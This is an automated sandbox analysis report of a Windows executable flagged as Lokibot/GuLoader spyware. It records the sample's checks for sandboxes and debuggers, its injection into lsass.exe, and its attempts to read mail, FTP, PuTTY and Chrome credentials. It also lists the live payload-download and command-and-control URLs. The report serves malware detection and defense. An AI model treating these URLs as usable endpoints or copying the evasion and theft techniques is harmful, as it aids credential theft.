        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

        Malware Analysis System Evasion:

        barindex
        Tries to detect Any.runShow sources
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041116904.00000000031A0000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866850076.0000000002430000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238039182344.0000000000734000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866850076.0000000002430000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://FABRICRAFT.CO.ZA/FARMANT_HHVNWJNA195.BIN
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041116904.00000000031A0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe TID: 3304Thread sleep count: 335 > 30Jump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe TID: 3304Thread sleep time: -20100000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B36F rdtsc 2_2_0227B36F
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeThread delayed: delay time: 60000Jump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeSystem information queried: ModuleInformationJump to behavior
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
        Source: lsass.exe, 0000000C.00000000.238321436312.000001896A6B0000.00000004.00000001.sdmpBinary or memory string: pvmicshutdownNT SERVICE
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041116904.00000000031A0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866850076.0000000002430000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://fabricraft.co.za/Farmant_hhVNwJna195.bin
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
        Source: lsass.exe, 0000000C.00000000.238321436312.000001896A6B0000.00000004.00000001.sdmpBinary or memory string: pvmicvssNT SERVICE
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
        Source: lsass.exe, 0000000C.00000000.238334385048.000001896B043000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869451561.000001896B047000.00000004.00000001.sdmpBinary or memory string: DOMAINS\Builtin\Aliases\Names\Hyper-V Administrators
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: vmicvss
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864964902.00000000008DB000.00000004.00000020.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864836413.00000000008D1000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
        Source: lsass.exe, 0000000C.00000000.238321436312.000001896A6B0000.00000004.00000001.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041116904.00000000031A0000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866850076.0000000002430000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWp7
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238039182344.0000000000734000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
        Source: lsass.exe, 0000000C.00000002.242864168995.000001896A613000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311349709.000001896A613000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330424875.000001896A613000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

        Anti Debugging:

        barindex
        Hides threads from debuggersShow sources
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B36F rdtsc 2_2_0227B36F
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227ADAD mov eax, dword ptr fs:[00000030h]2_2_0227ADAD
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227A66D mov eax, dword ptr fs:[00000030h]2_2_0227A66D
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227BE73 mov eax, dword ptr fs:[00000030h]2_2_0227BE73
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227BE7D mov eax, dword ptr fs:[00000030h]2_2_0227BE7D
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227536A mov eax, dword ptr fs:[00000030h]2_2_0227536A
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022757CF mov eax, dword ptr fs:[00000030h]2_2_022757CF
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02275822 mov eax, dword ptr fs:[00000030h]2_2_02275822
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02275802 mov eax, dword ptr fs:[00000030h]2_2_02275802
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02277DAD mov eax, dword ptr fs:[00000030h]2_2_02277DAD
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02279224 LdrInitializeThunk,2_2_02279224

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeMemory written: C:\Windows\System32\lsass.exe base: 1896A5B0000Jump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeMemory written: C:\Windows\System32\lsass.exe base: 1896B540000Jump to behavior
        Allocates memory in foreign processesShow sources
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeMemory allocated: C:\Windows\System32\lsass.exe base: 1896A5B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeMemory allocated: C:\Windows\System32\lsass.exe base: 1896B540000 protect: page execute and read and writeJump to behavior
        Creates a thread in another existing process (thread injection)Show sources
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeThread created: C:\Windows\System32\lsass.exe EIP: 6A5B0000Jump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess created: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe "C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe" Jump to behavior
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866195652.0000000000FF0000.00000002.00020000.sdmpBinary or memory string: Program Manager
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866195652.0000000000FF0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866195652.0000000000FF0000.00000002.00020000.sdmpBinary or memory string: Progman
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866195652.0000000000FF0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information:

        barindex
        Yara detected LokibotShow sources
        Source: Yara matchFile source: Process Memory Space: ORDINE + DDT A.M.F SpA.exe PID: 8108, type: MEMORYSTR
        GuLoader behavior detectedShow sources
        Source: Initial fileSignature Results: GuLoader behavior
        Tries to steal Mail credentials (via file / registry access)Show sources
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
        Tries to harvest and steal ftp login credentialsShow sources
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
        Tries to harvest and steal browser information (history, passwords, etc)Show sources
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

        Remote Access Functionality:

        barindex
        Yara detected LokibotShow sources
        Source: Yara matchFile source: Process Memory Space: ORDINE + DDT A.M.F SpA.exe PID: 8108, type: MEMORYSTR

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management InstrumentationDLL Side-Loading1Process Injection312Masquerading1OS Credential Dumping2Security Software Discovery321Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion221Credentials in Registry1Process Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection312Security Account ManagerVirtualization/Sandbox Evasion221SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSystem Information Discovery4Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol115SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        ORDINE + DDT A.M.F SpA.exe22%VirustotalBrowse

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        farmanat.ro11%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://farmanat.ro/arman30/five/fre.php12%VirustotalBrowse
        https://farmanat.ro/arman30/five/fre.php100%Avira URL Cloudmalware
        http://farmanat.ro/arman30/five/fre.php11%VirustotalBrowse
        http://farmanat.ro/arman30/five/fre.php100%Avira URL Cloudmalware

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        fabricraft.co.za
        197.242.150.64
        truefalse
          high
          farmanat.ro
          176.223.209.128
          truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://farmanat.ro/arman30/five/fre.phptrue
          • 11%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          https://fabricraft.co.za/Farmant_hhVNwJna195.binfalse
            high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmpfalse
              high
              https://fabricraft.co.za/ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpfalse
                high
                https://fabricraft.co.za/Farmant_hhVNwJna195.binnORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpfalse
                  high
                  http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpfalse
                    high
                    http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpfalse
                      high
                      http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpfalse
                        high
                        http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpfalse
                          high
                          https://fabricraft.co.za/.ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/wsdl/lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpfalse
                              high
                              https://farmanat.ro/arman30/five/fre.phpORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864836413.00000000008D1000.00000004.00000020.sdmptrue
                              • 12%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              unknown
                              http://schemas.xmlsoap.org/wsdl/soap12/Plsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpfalse
                                high
                                http://www.live.comlsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.msn.comlsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmpfalse
                                      high
                                      https://fabricraft.co.za/Farmant_hhVNwJna195.binws;ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpfalse
                                        high
                                        http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmpfalse
                                          high
                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpfalse
                                            high
                                            https://fabricraft.co.za/Farmant_hhVNwJna195.bincORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpfalse
                                              high

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              176.223.209.128
                                              farmanat.roUnited Kingdom
                                              39756ROHOSTWAY-ASROtrue
                                              197.242.150.64
                                              fabricraft.co.zaSouth Africa
                                              37611AfrihostZAfalse

                                              General Information

                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                              Analysis ID:528460
                                              Start date:25.11.2021
                                              Start time:10:45:15
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 13m 4s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:ORDINE + DDT A.M.F SpA.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                              Run name:Suspected Instruction Hammering
                                              Number of analysed new started processes analysed:14
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@3/5@3/2
                                              EGA Information:Failed
                                              HDC Information:Failed
                                              HCA Information:Failed
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.82.19.171, 20.54.122.82
                                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, client.wns.windows.com, wdcpalt.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              10:48:01API Interceptor876x Sleep call for process: ORDINE + DDT A.M.F SpA.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              176.223.209.128ATTACHMENT 6637268#Hydro tech BG_pdf.exeGet hashmaliciousBrowse
                                              • farmanat.ro/arman30/five/fre.php
                                              ARRIVAL NOTICE DHL Code Nr 4622256860_pdf.exeGet hashmaliciousBrowse
                                              • farmanat.ro/arman30/five/fre.php
                                              Richiesta di quotazione ISCOTRANS SPA Nr.5653.exeGet hashmaliciousBrowse
                                              • farmanat.ro/arman30/five/fre.php
